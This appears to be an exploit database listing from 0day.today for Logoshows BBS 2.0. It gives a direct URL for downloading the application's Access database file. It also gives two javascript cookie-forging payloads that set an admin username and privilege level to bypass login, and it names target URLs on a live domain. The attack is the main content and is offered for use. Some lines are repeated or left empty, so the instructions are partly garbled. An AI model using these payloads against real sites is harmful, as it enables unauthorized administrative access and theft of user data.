[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Logoshows BBS 2.0 (DD/ICH) Multiple Remote Vulnerabilities

Author
ZoRLu
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5636
Category
web applications
Date add
06-08-2009
Platform
unsorted
==========================================================
Logoshows BBS 2.0 (DD/ICH) Multiple Remote Vulnerabilities
==========================================================


Logoshows BBS 2.0 DD

vuln:

http://www.logoshows.com/bbs/database/globepersonnel.mdb

Logoshows BBS 2.0 ICH

yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info

ref: http://www.milw0rm.com/exploits/9389

demo:

http://www.logoshows.com/bbs/globepersonnel_login.asp

exploit: 

javascript:document.cookie = "pb%5Fusername=admin; path=/";

exploit: 

javascript:document.cookie = "level=3; path=/";

after you go here:


after go here:

http://www.logoshows.com/bbs/globepersonnel_reply.asp?id=6&topic=6&recordnum=0



#  0day.today [2024-12-26]  #